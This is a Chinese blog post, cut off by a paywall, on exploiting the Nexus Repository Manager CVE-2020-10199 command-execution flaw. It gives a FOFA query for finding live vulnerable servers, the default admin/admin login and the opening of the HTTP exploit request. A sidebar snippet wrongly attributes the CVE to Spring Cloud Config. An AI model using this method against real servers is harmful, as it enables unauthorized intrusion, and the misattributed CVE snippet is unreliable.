getshell之Nexus远程命令执行(CVE-2020-10199)

最新推荐文章于 2023-06-06 20:39:17 发布
最新推荐文章于 2023-06-06 20:39:17 发布
阅读量2k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MoCoCN/article/details/110533683
版权

@MoCo菜弟弟 Nexus远程命令执行CVE-2020-10199

0x01漏洞描述

​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。
 
​ Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。

​ 在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。

0x02漏洞影响

危险等级

高危

影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

0x03资产收集

首先开启万能的FOFA,让我们搜一波Nexus Repository Manager OSS/Pro的站
FOFA语法

app="Nexus"

在这里插入图片描述寻找一个版本<= 3.21.1站点进去
在这里插入图片描述默认账号admin
默认密码admin

0x04漏洞验证

Payload:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: XXX.XXX.XXx.XXX:XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 0.XXXXXXXXXXXXXXXX
Content-T
最低0.47元/天 解锁文章
MoCoCN
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用CVE-2020-17518一键Getshell
baidu_38844729的博客
01-13 594
漏洞描述 Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置 漏洞利用 import requests import json import base64 #获取tmpdir的路径 url = "http://ip:port" tmpdir_url = url + '/jobmanager/config' tmpdir_res = requests.get(tmpdir_url) tmpdir = json.loads(
nexus 命令执行CVE-2020-10204)复现
weixin_63124284的博客
11-01 1481
Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。
Nexus远程命令执行CVE-2020-10199
Adminxe的博客
12-03 1138
0x01 漏洞描述 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。   Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。   在 Nexus Repository Manager OSS/Pro 3.21.1 及..
s2-061(CVE-2020-17530)漏洞复现+利用+getshell工具。
szgyunyun的博客
12-17 3030
声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 S2_061出来有一阵子了,早就想搞一波了,都是出差给耽误了。 漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apac
Shell常用脚本:Nexus批量上传本地仓库脚本
weixin_39651356的博客
07-26 1121
Nexus批量上传仓库文件脚本
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
nexus启动脚本---第一个shell脚本
sdhsdhsdhsdh的专栏
08-12 395
研究maven有一阵子了,镜像仓库nexus也早已搭建起来,之前在公司是搭建在server上面,所以也不用频繁的去启动nexus。但是现在在家里想要搭建一个nexus,每次开机都要去启动nexus,搞的比较烦,正好在学习linux,所以就用shell写了一个小小的启动脚本,因为是写的第一个shell脚本,所以写下来,以示纪念。 虽然很简单,因为是第一次写,还是费了比较长的时间。 下面就将出错的...
nexus打点
wcwdnmdnmd的博客
11-10 647
nuxus后台rce
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
ch258563的博客
06-06 1556
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1140
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令执行
CVE-2019-5475】Sonatype Nexus Repository Manager操作系统命令注入漏洞复现
Blog of Jaoing
04-21 1160
Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 Sonatype NXRM中存在操作系统命令注入漏洞。攻击者可利用该漏洞执行代码......
Sonatype Nexus Repository Manager OSS仓库管理私服(一)——搭建私服
热门推荐
野猿新一
09-03 2万+
nexus有收费版和开源免费版,其中的Nexus Repository Manager OSS是开源免费的,其功能基本满足我们的需求,所以本次搭建采用该版本。 下载 首先在Nexus Repository Manager OSS简介页面可以看到一些简介,在这里可以跳转到下载页面 Nexus目前支持OS X、Windows和Unix三种平台的安装 由于是在本地电脑搭建,所以我这里选择...
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1642
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)
qq_36369941的博客
07-17 3101
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199
m0_48520508的博客
03-02 1370
0x00 简介 nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。 主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。 0x01漏洞概述 在 Nexus Repository Manager OSS
CVE-2020-10199
最新发布
05-25
CVE-2020-10199是一个影响Spring Cloud Config的安全漏洞。攻击者可以通过在Spring Cloud Config Server中恶意配置文件路径上的反向路径遍历漏洞来读取应用程序上的任何文件。该漏洞已被修复。建议受影响的用户及时更新其Spring Cloud Config Server版本到已发布的安全版本,以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值